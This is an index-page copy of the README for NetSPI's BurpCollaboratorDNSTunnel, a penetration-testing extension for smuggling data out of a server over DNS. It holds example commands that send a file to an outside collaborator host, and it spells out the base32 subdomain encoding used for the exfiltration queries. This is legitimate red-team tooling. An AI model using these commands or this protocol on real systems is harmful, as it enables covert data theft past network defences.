Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/netspi/burpcollaboratordnstunnel

A DNS tunnel utilizing the Burp Collaborator
https://github.com/netspi/burpcollaboratordnstunnel

Last synced: about 1 month ago
JSON representation

A DNS tunnel utilizing the Burp Collaborator

Awesome Lists containing this project

README

        

# BurpCollaboratorDNSTunnel
A DNS tunnel utilizing the Burp Collaborator.

This extension sets up a private Burp Collaborator server as a DNS tunnel. One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.

### Interactive usage with scripts
Multiple scripts exist for exfiltrating data from different environments. The scripts will be set up on the box to exfiltrate data from and will connect to a Burp Suite instance on our local box.

_[B] Burp Suite_

_[S] Script_

1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
4) [S] Enter the Burp Collaborator address from (2) when prompted
5) [S] Paste file name to be tunneled when prompted
6) [B] After tunneling is completed click "Poll now"

### Non-interactive usage with scripts
The scripts don't require user interaction if all the necessary information is provided as arguments.

_[B] Burp Suite_

_[S] Script_

1) [B] Click "Start listening"
2) [B] Copy the printed location of the Burp Collaborator server
3) [S] Run the script
- Windows: `./tunnel.ps1 abc123.private-burp.com .\test.txt`
- Linux: `./tunnel.sh -d abc123.private-burp.com -f test.txt`
4) [B] After tunneling is completed click "Poll now"

### Usage between 2 Burp Suite instances
_[R] Receiving Burp instance_

_[S] Sending Burp instance_

1) [R] Click "Start listening"
2) [R] Copy the printed location of the Burp Collaborator server
3) [S] Enter the address from (2) in the "Burp Collaborator Address" text box
4) [S] Paste data to be tunneled in the "Data to tunnel" text box
5) [S] Click "Tunnel Data"
6) [R] After tunneling is completed click "Poll now"

Check the "Verbose" box for debugging information to see any errors in sending/receiving data.

### Contributing
It would be nice to have more compact versions of the scripts for instances where you have to hand-type the scripts into the environment. If you would like to modify or add a script follow the basic protocol below:

#### 1) Tunneling Data
```
[dnsFlag].[chunk].[chunkNumber].[burpcollaborator] #eg: nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[chunk] Will be a 63-character base32-encoded chunk of data, removing any padding '='
[chunkNumber] Is the index of the current chunk in the overall tunneled data
[burpcollaborator] Is the full address of the private Burp Collaborator server
```

#### 2) Notifying size of data sent
```
[dnsFlag].[amountFlag].[totalChunkCount].[burpcollaborator] #eg: nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net
[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic
[amountFlag] This subdomain's value will be 'amount' so the tunnel can identify this is as the request declaring the amount of data sent
[totalChunkCount] The total number of chunks sent through the tunnel, excluding this request
[burpcollaborator] Is the full address of the private Burp Collaborator server
```

### Example
An example is below (click to enlarge). The example is using one Burp Suite instance and a Kali Linux box.